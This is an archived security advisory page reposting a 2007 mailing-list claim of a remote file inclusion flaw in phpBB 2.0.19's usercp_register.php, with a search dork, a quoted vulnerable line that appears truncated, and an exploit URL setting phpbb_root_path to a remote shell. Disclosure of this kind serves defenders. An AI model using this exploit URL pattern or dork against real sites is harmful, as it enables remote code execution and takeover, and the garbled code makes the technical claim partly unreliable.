Computer Security

Security Advisory: Remote File Include In phpBB-2.0.19
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Image_Upload Script  Remote File Inclusion Exploit Free Image Hosting 2.0

  Net Side Content Management System

  aspWebCalendar Remote SQL Injection Vulnerability

  LMS <= 1.8.9 Vala Remote File Inclusion Vulnerabilities

From:RaeD Hasadya <raed_(at)_bsdmail.com>
Date:25.03.2007
Subject:Remote File Include In phpBB-2.0.19

By Hasadya Raed
Contact : RaeD@BsdMail.Com | Israel
--------------------------------------------------
Script : phpBB-2.0.19
Dork : phpBB-2.0.19
--------------------------------------------------
B.File :
usercp_register.php
--------------------------------------------------
V.Code :
include($phpbb_root_path . ');
--------------------------------------------------
Exploit :
http://www.Victim.Com/Path_Script/includes/usercp_register.php?phpbb_root_path=[S
hell-Attack]



 



--
_______________________________________________
Get your free email from http://bsdmail.com
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
 


Рейтинг@Mail.ru